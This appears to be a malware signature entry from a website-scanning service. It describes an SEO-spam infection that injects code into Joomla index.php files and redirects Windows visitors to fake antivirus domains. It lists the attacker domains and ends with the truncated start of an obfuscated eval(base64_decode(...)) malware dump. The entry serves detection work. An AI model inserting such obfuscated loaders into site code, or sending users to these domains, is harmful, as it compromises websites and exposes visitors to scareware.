SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware-entry-mwspams8

malware-entry-mwspams8

Description Malware used on a large scale SEO SPAM work
controlled by these domains:
http://gberbhjerfds.osa.pl
http://newwave.orge.pl
http://p3p0.com

Fake AV: When it detects that a user is using Windows, it will
redirect them to:
http://www3.virus-searching49.co.cc
And other domains to try to push the fake anti-virus.

Affecting: Joomla sites. Malicious code is added to the index.php
file.

Malware dump:


eval (base64_decode("aWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiZ29